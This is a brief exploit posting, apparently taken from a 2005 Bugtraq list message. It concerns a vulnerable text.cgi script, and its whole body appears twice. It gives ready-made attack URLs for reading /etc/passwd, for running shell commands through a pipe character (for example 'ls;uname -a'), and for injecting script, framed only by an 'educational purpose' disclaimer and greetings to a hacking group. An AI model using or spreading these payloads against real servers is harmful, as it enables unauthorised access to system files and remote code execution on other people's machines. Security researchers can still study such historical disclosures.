QUOTE
remote command execution in text.cgi script
IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE
1)file showing
http://www.target.com/cgi-bin/text.cgi?/etc/passwd
2)remote code execution
http://www.target.com/cgi-bin/text.cgi?|command
3)CSS
http://www.target.com/cgi-bin/text.cgi?<...</script>
ex:
http://www.target.com/cgi-bin/text.cgi?|ls;uname -a;
greetz to all magattack memebers
IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE
1)file showing
http://www.target.com/cgi-bin/text.cgi?/etc/passwd
2)remote code execution
http://www.target.com/cgi-bin/text.cgi?|command
3)CSS
http://www.target.com/cgi-bin/text.cgi?<...</script>
ex:
http://www.target.com/cgi-bin/text.cgi?|ls;uname -a;
greetz to all magattack memebers
Source: http://seclists.org/lists/bugtraq/2005/Apr/0409.html
